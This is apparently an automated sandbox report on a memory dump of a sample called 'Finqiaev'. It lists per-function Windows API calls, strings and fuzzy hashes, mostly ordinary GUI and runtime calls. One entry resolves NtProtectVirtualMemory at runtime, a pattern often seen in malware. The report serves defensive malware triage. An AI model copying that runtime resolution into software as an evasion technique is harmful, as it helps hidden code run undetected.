Opcode Fuzzy Hash: 5e40bc10bb7e17d2608651601d50c8ee15a11802f4fd877ebbd0a961678247dd
Instruction Fuzzy Hash: CC312876A00209AFEB50DEA5C984AEF77FCEF89204F054526E915F3200E634F908DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 040FD0F0 Relevance: 10.6, APIs: 7, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 040FD161
GetWindowLongA.USER32(00000000,000000EC), ref: 040FD173
GetClassLongA.USER32(00000000,000000E6), ref: 040FD186
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 040FD1C6
SetWindowLongA.USER32(00000000,000000EC,?), ref: 040FD1DA
SetClassLongA.USER32(00000000,000000E6,?), ref: 040FD1EE
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 040FD20A

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Long$Window$Class
String ID:
API String ID: 2026531576-0
Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction ID: 3676a298fd659ed35855db05d37e43e035dfc95222823ab24e0c75aa48b4a728
Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
Instruction Fuzzy Hash: BB21C330308241BAEA01A77C8C44AFEB7996FD121CF184A64F595FB6D0CB74F845D792

Uniqueness

Uniqueness Score: -1.00%

Function 040DB0A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 040DB0FC
GetSystemMetrics.USER32(00000000), ref: 040DB111
GetSystemMetrics.USER32(00000001), ref: 040DB11C
lstrcpy.KERNEL32(?,DISPLAY), ref: 040DB146

Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23

Strings

GetMonitorInfoA, xrefs: 040DB0BC
DISPLAY, xrefs: 040DB13D

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: 9bd52fb960d0caf2674966b3312daf12e53b1e7bc8e6322be067060988763492
Instruction ID: 8f3e48d4b9bbf9d39d11f35d56e449db7b7254cd9073550894bb9d2f05f36034
Opcode Fuzzy Hash: 9bd52fb960d0caf2674966b3312daf12e53b1e7bc8e6322be067060988763492
Instruction Fuzzy Hash: 541103396403049FE720CF668C447A7B7F8EF89794F424929EC55EB240D274BC88CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 040DB178 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 040DB1D0
GetSystemMetrics.USER32(00000000), ref: 040DB1E5
GetSystemMetrics.USER32(00000001), ref: 040DB1F0
lstrcpy.KERNEL32(?,DISPLAY), ref: 040DB21A

Part of subcall function 040DACA4: GetProcAddress.KERNEL32(0414A568,00000000), ref: 040DAD23

Strings

GetMonitorInfoW, xrefs: 040DB190
DISPLAY, xrefs: 040DB211

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: b8d84cd9016726f998b1cb93e3d7740b673f6012d2b5d1ce0dbe43e1dca77f57
Instruction ID: 7dfaeb0dc58d9e18c6e9f548649c9548fe85a8caa2f7f9d973a844b0adcb52ec
Opcode Fuzzy Hash: b8d84cd9016726f998b1cb93e3d7740b673f6012d2b5d1ce0dbe43e1dca77f57
Instruction Fuzzy Hash: 1811DF366403005FD720CE659944BBBB7F8EF45755F024529EC85EB240D274B848CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 040B4608 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040B46CF,?,?,?,00000002,040B477A,040B2DAF,040B2DF6), ref: 040B4641
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040B46CF,?,?,?,00000002,040B477A,040B2DAF,040B2DF6), ref: 040B4647
GetStdHandle.KERNEL32(000000F5,040B4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040B46CF), ref: 040B465C
WriteFile.KERNEL32(00000000,000000F5,040B4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,040B46CF), ref: 040B4662
MessageBoxA.USER32(00000000,Runtime error at 00000000,0411A754,00000000), ref: 040B4680

Strings

Runtime error at 00000000, xrefs: 040B463A, 040B4679

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Runtime error at 00000000
API String ID: 1570097196-1393363852
Opcode ID: 725b189ba9ad95b4c7c0a44aa18f60e82ca04450fc6fc227fb20176ac401b012
Instruction ID: 810b1b29f121557bf134f34428ed636ba29adb9a2209bf9598866185ec1dad1e
Opcode Fuzzy Hash: 725b189ba9ad95b4c7c0a44aa18f60e82ca04450fc6fc227fb20176ac401b012
Instruction Fuzzy Hash: 19F0F6706413C075FA10A7606C55FD927988B84B6CF104714B2E0BC0D287B875C48FAE

Uniqueness

Uniqueness Score: -1.00%

Function 040CD6E4 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 040CD6EF
GetCurrentThreadId.KERNEL32 ref: 040CD6FE
RtlEnterCriticalSection.NTDLL(0414A2EC), ref: 040CD743
InterlockedExchange.KERNEL32(0411AAF0,?), ref: 040CD75F
RtlLeaveCriticalSection.NTDLL(0414A2EC), ref: 040CD7B8
RtlEnterCriticalSection.NTDLL(0414A2EC), ref: 040CD827

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CriticalSection$CurrentEnterThread$ExchangeInterlockedLeave
String ID:
API String ID: 1985336998-0
Opcode ID: ecdffe17b19374766dcf1dd27ad514c15dcf689b8843aa13fe1df2d3c8b0c641
Instruction ID: 78c73b847e9c6b0dfad5b78019c7f12375d3b50e05d8f0b460ff7f12530925f5
Opcode Fuzzy Hash: ecdffe17b19374766dcf1dd27ad514c15dcf689b8843aa13fe1df2d3c8b0c641
Instruction Fuzzy Hash: 8C31AF30A44644EFEB11DBA5C890EADB7E8EF49718F5188B8E800F6650E7797844DE62

Uniqueness

Uniqueness Score: -1.00%

Function 04103DEC Relevance: 9.1, APIs: 6, Instructions: 105windowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 04103E00
IsWindowUnicode.USER32 ref: 04103E14
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 04103E35
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 04103E4B
TranslateMessage.USER32 ref: 04103ED4
DispatchMessageW.USER32 ref: 04103EE0

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchTranslateUnicodeWindow
String ID:
API String ID: 4061826187-0
Opcode ID: 20215345d2377155f5a8e99b428e505dba780bae775f7917dc718456a911b0ea
Instruction ID: 0d6ee3cbad26cf57bd58f24501796cba974dde6ef6713a6f63a5e16fe4c4af1e
Opcode Fuzzy Hash: 20215345d2377155f5a8e99b428e505dba780bae775f7917dc718456a911b0ea
Instruction Fuzzy Hash: 0A21F8307083486BFA316A2C0DC1BFB96894FD2B4CF14C599FDE1A72C2DBE6B4464166

Uniqueness

Uniqueness Score: -1.00%

Function 04101D24 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 04101D79
CreateFontIndirectA.GDI32(?), ref: 04101D86
SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 04101DC5
CreateFontIndirectA.GDI32(?), ref: 04101DD5
CreateFontIndirectA.GDI32(?), ref: 04101DEE

Part of subcall function 040D2518: MulDiv.KERNEL32(00000000,?,00000048), ref: 040D2525

GetStockObject.GDI32(0000000D), ref: 04101E14

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CreateFontIndirect$InfoParametersSystem$ObjectStock
String ID:
API String ID: 2473929816-0
Opcode ID: 6fed05f2b1cf9a215ccf84a4200a0a270a851855f4b2b4a83396b4d50d1aaa2e
Instruction ID: f2d7d959fb49c45844dc91e1aa345f8215acd77adead71e204f17f660438ac5f
Opcode Fuzzy Hash: 6fed05f2b1cf9a215ccf84a4200a0a270a851855f4b2b4a83396b4d50d1aaa2e
Instruction Fuzzy Hash: 6B31C830745204ABF765EB64C885BD933F4EF44309F4584B0A948EB285DF79BC48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 040D43AC Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON

Download Yara Rule

APIs

Part of subcall function 040D4258: GetObjectA.GDI32(?,00000054), ref: 040D426C

CreateCompatibleDC.GDI32(00000000), ref: 040D43CE
SelectPalette.GDI32(?,?,00000000), ref: 040D43EF
RealizePalette.GDI32(?), ref: 040D43FB
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 040D4412
SelectPalette.GDI32(?,00000000,00000000), ref: 040D443A
DeleteDC.GDI32(?), ref: 040D4443

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: ca983b071dd89e302ff3ff81647a2a9af243760c58e216ec589564008954ae84
Instruction ID: 79131ddb5092b01bdad9be15e67c000ceb98df34f1cf515c75d9625d6068b39e
Opcode Fuzzy Hash: ca983b071dd89e302ff3ff81647a2a9af243760c58e216ec589564008954ae84
Instruction Fuzzy Hash: B9114F75E043087BEB11DBA8CC81FDEB7FCEB48608F518464B518F7280D675A9448B65

Uniqueness

Uniqueness Score: -1.00%

Function 04106C70 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 04106CA4
GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 04106CB5

Strings

ImageList_WriteEx, xrefs: 04106CAF
comctl32.dll, xrefs: 04106C84
comctl32.dll, xrefs: 04106C9F

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
API String ID: 1646373207-3125200627
Opcode ID: 6747b36ea2d299c4b81b1f06713c9020e1b6fd2663998b0b7d5a7af0cbad24c8
Instruction ID: 253b84c697823a082ac9e81026b605c4957bdee026aa26eb00eddc58ab7390f4
Opcode Fuzzy Hash: 6747b36ea2d299c4b81b1f06713c9020e1b6fd2663998b0b7d5a7af0cbad24c8
Instruction Fuzzy Hash: 7221A774300240ABF710AF79DCC4AA937E9DB8174DB018468E885E77D0D7BABC50DB54

Uniqueness

Uniqueness Score: -1.00%

Function 040E3008 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 040D02A4: RegCloseKey.ADVAPI32(10940000,040D0180,00000001,040D0222,?,?,040D76BA,00000008,0414A374,00000048,00000000,040D775F), ref: 040D02B8

Part of subcall function 040D0308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,040D04A2), ref: 040D0374

Part of subcall function 040BDC04: SetErrorMode.KERNEL32 ref: 040BDC0E
Part of subcall function 040BDC04: LoadLibraryA.KERNEL32(00000000,00000000,040BDC58,?,00000000,040BDC76), ref: 040BDC3D

GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 040E30C1
FreeLibrary.KERNEL32(?,040E30FB,?,00000000,00000000,040E313B), ref: 040E30EE

Strings

KbdLayerDescriptor, xrefs: 040E30B8
Layout File, xrefs: 040E308D
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 040E3075

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLoadModeOpenProc
String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
API String ID: 3547551084-2194312379
Opcode ID: 396955a1c761b652301ded0e025a998d448fe51529a1d3af04f8261d6ab1b13a
Instruction ID: a5d1caf85e3c9ac878b5e77131fa42ac117bfd6bde25aec7df16089bf3c46704
Opcode Fuzzy Hash: 396955a1c761b652301ded0e025a998d448fe51529a1d3af04f8261d6ab1b13a
Instruction Fuzzy Hash: 0121A170E00249AFEF01EFA5CC519EEBBBAFB89308F4184A4E840B7600D739B955CB54

Uniqueness

Uniqueness Score: -1.00%

Function 040D614C Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 040D61A2
GetDeviceCaps.GDI32(00000000,0000000C), ref: 040D61B7
GetDeviceCaps.GDI32(00000000,0000000E), ref: 040D61C1
CreateHalftonePalette.GDI32(00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,040D4D0F,00000000,040D4D9B), ref: 040D61E5
ReleaseDC.USER32(00000000,00000000), ref: 040D61F0

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
Instruction ID: 5b52f0b4f09d99fe7f5410ba69ed1de08f542c4dceaf6672aae8009e6a827e49
Opcode Fuzzy Hash: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
Instruction Fuzzy Hash: 6011CF356013A95EEB60EF34C8407EE37D1AF85359F080521FC407B181D7B6B898C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 04101C88 Relevance: 7.6, APIs: 5, Instructions: 57windowthreadCOMMON

Download Yara Rule

APIs

WindowFromPoint.USER32(?,?), ref: 04101CB0
GetCurrentThreadId.KERNEL32 ref: 04101CC5
SendMessageA.USER32(00000000,00000084,00000000,?), ref: 04101CEE
SendMessageA.USER32(00000000,00000020,00000000,?), ref: 04101D00
SetCursor.USER32(00000000), ref: 04101D12

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: MessageSend$CurrentCursorFromPointThreadWindow
String ID:
API String ID: 3188251016-0
Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction ID: 07759be879b86fa9e36c92de7dc811b5aade3a2ed65bf360fd0e62732f388ab3
Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
Instruction Fuzzy Hash: 8101963610435075EA216B648CC4FBB76A8DFC5B5DF108459F5C4AB190E76AFC00936A

Uniqueness

Uniqueness Score: -1.00%

Function 040BBC00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,040BBDD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 040BBC2F

Strings

yyyy, xrefs: 040BBD25
ggg, xrefs: 040BBD15
eeee, xrefs: 040BBD3E

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: LocaleThread
String ID: eeee$ggg$yyyy
API String ID: 635194068-1253427255
Opcode ID: dc4dca9b0bdb87cac3e65f93872e1945b06a31b10914b40557afa6470a9b9a0a
Instruction ID: 14a0ccadf13445b0e7b2c4827d1cd4e23bcd1524363ef6f688915bc72d1d099c
Opcode Fuzzy Hash: dc4dca9b0bdb87cac3e65f93872e1945b06a31b10914b40557afa6470a9b9a0a
Instruction Fuzzy Hash: CC4112607141054BF712EA69C8806FEB2FADB8120CB144425D5E1F7B55EA38FE069AEE

Uniqueness

Uniqueness Score: -1.00%

Function 040CFC14 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 040CFC21
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 040CFC27

Strings

NtProtectVirtualMemory, xrefs: 040CFC17
C:\Windows\System32\ntdll.dll, xrefs: 040CFC1C

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
API String ID: 1646373207-1386159242
Opcode ID: 9c94c21738d63fea7abee7599d785bb8ebe88ce32ed6be266fa1d4cb35bc5d31
Instruction ID: f81fae0adab17d58fc4b94b13874029004ddc81879ea6297e33cac5db802a7a0
Opcode Fuzzy Hash: 9c94c21738d63fea7abee7599d785bb8ebe88ce32ed6be266fa1d4cb35bc5d31
Instruction Fuzzy Hash: DBE0B6B6640209AF8B40EF99D985ECB37ECAB1C7547404404BA18E7201D635F8909BB6

Uniqueness

Uniqueness Score: -1.00%

Function 040BD6A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0411910B,00000000,0411911E), ref: 040BD6A6
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 040BD6B7

Strings

GetDiskFreeSpaceExA, xrefs: 040BD6B1
kernel32.dll, xrefs: 040BD6A1

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: a06c6e4a1179ae19459379162309a1450082071a9e8e90d80bee84422057e1e8
Instruction ID: bef99ded1bc095ab6448fefef5bbfed9db0419d1439f568545601a4bb2da1bc4
Opcode Fuzzy Hash: a06c6e4a1179ae19459379162309a1450082071a9e8e90d80bee84422057e1e8
Instruction Fuzzy Hash: C0D05EB13963454BEB00BBB564C0AC166E8EF1025AB00052564887A220C779E882CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 040ED52C Relevance: 6.3, APIs: 4, Instructions: 308COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 040ED6AB
MulDiv.KERNEL32(?,?,?), ref: 040ED6E6

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df7ace30612489e1ea40eac236e3200ec7f47334c344690cfcf59d127be69781
Instruction ID: 76a6b6501b675f5635db618cbf3abae783f90d4e85203924d3badeab06320573
Opcode Fuzzy Hash: df7ace30612489e1ea40eac236e3200ec7f47334c344690cfcf59d127be69781
Instruction Fuzzy Hash: 2FD17970A04A0ADFDB11CF7AC584AAABBF2FF48300F108959E896AB354D731F951CB51

Uniqueness

Uniqueness Score: -1.00%

Function 040E80E0 Relevance: 6.2, APIs: 4, Instructions: 212COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 040E8155
GetDesktopWindow.USER32 ref: 040E8285
SetCursor.USER32(00000000), ref: 040E82C5
SetCursor.USER32(00000000), ref: 040E82DA

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CursorDesktopWindow
String ID:
API String ID: 3023140981-0
Opcode ID: 9dd4c74ace6471e94ebd61bbf4fd2a23df32c62696ca2c6e3465347deea223c5
Instruction ID: 58875dbf67095ec5ff49e71723c1bbf84e2a026712b6a43aa44027643f48dba4
Opcode Fuzzy Hash: 9dd4c74ace6471e94ebd61bbf4fd2a23df32c62696ca2c6e3465347deea223c5
Instruction Fuzzy Hash: 8E915A39240201CFD784EF2AE188A6977E5EFD5388F06C494E944AB356D738ECC6DB91

Uniqueness

Uniqueness Score: -1.00%

Function 040FD6DC Relevance: 6.2, APIs: 4, Instructions: 174windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 040FD800
SetMenu.USER32(00000000,00000000), ref: 040FD81D
SetMenu.USER32(00000000,00000000), ref: 040FD852
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 040FD8B5

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: Menu$Window
String ID:
API String ID: 939306805-0
Opcode ID: 49eb41a687e2310c9158e60fcf717281ed6a45716c03206449959ea3f364e01b
Instruction ID: ca07c70009564bc0d4ba6ef14fc4dc4c64d9932a4af5d2f51d7be96019ddfeb8
Opcode Fuzzy Hash: 49eb41a687e2310c9158e60fcf717281ed6a45716c03206449959ea3f364e01b
Instruction Fuzzy Hash: 42518230A047005BEB61EF78CC84BDA37D59F4070CF4444B5AE46BFA96DA78F8458791

Uniqueness

Uniqueness Score: -1.00%

Function 040BF554 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 040BF603
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 040BF61F
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 040BF696
VariantClear.OLEAUT32(?), ref: 040BF6BF

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction ID: 3ee12d8620de9810bd3be4b685103cbcd84d3b486f85b23b3162fff33fb8cb10
Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
Instruction Fuzzy Hash: C841DA75A0161A9FDB61EF58CC90BD9B3FCAB48618F0041D5E689F7211DA74BF808F98

Uniqueness

Uniqueness Score: -1.00%

Function 040BBE3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 040BBE59
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 040BBE7D
GetModuleFileNameA.KERNEL32(041497F8,?,00000105,?,?,00000105), ref: 040BBE98
LoadStringA.USER32(00000000,0414A678,?,00000100), ref: 040BBF2E

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 1230348cf55c8a6d24c3a7ca499215201fc175a1691a016f7382f24204d92e66
Instruction ID: e9b3a5e8cebf806f3c0733c122f0844a83d1014843a02d391d2d452bf87c8a5b
Opcode Fuzzy Hash: 1230348cf55c8a6d24c3a7ca499215201fc175a1691a016f7382f24204d92e66
Instruction Fuzzy Hash: 49410B71A002589BEB61EB68CC84BDAB7FD9B58308F4040E5A588F7251D774BF848F99

Uniqueness

Uniqueness Score: -1.00%

Function 04101538 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32(00000000), ref: 0410157D
GetDC.USER32(00000000), ref: 041015D2
GetDeviceCaps.GDI32(00000000,0000005A), ref: 041015DC
ReleaseDC.USER32(00000000,00000000), ref: 041015E7

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40b1000_Finqiaev.jbxd

Yara matches

Similarity

API ID: CapsDeviceKeyboardLayoutRelease
String ID:
API String ID: 3331096196-0
Opcode ID: 3e56bb85b84a125b72250ad45bcb3b00fbc6c79cb86db7f183ebf5423b765c8e
Instruction ID: 7a5cd67a21bdc8b13567d183c7c36e86d81d520d89580f9c5f995bb6d7d8c339
Opcode Fuzzy Hash: 3e56bb85b84a125b72250ad45bcb3b00fbc6c79cb86db7f183ebf5423b765c8e
Instruction Fuzzy Hash: 8031DA746012419FE740EF69D8C0B8977E0EB0531CF05817AED48EF391DB7AAC488B55

Uniqueness

Uniqueness Score: -1.00%

Function 040D4CBC Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 040D2E8C: RtlEnterCriticalSection.NTDLL(0414A3A0), ref: 040D2E94
Part of subcall function 040D2E8C: RtlLeaveCriticalSection.NTDLL(0414A3A0), ref: 040D2EA1
Part of subcall function 040D2E8C: RtlEnterCriticalSection.NTDLL(00000038), ref: 040D2EAA

Part of subcall function 040D614C: GetDC.USER32(00000000), ref: 040D61A2
Part of subcall function 040D614C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 040D61B7
Part of subcall function 040D614C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 040D61C1
Part of subcall function 040D614C: CreateHalftonePalette.GDI32(00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,040D4D0F,00000000,040D4D9B), ref: 040D61E5
Part of subcall function 040D614C: ReleaseDC.USER32(00000000,00000000), ref: 040D61F0

CreateCompatibleDC.GDI32(00000000), ref: 040D4D11
SelectObject.GDI32(00000000,?), ref: 040D4D2A
SelectPalette.GDI32(00000000,?,000000FF), ref: 040D4D53
RealizePalette.GDI32(00000000), ref: 040D4D5F

Memory Dump Source

Source File: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false

Joe Sandbox IDA Plugin

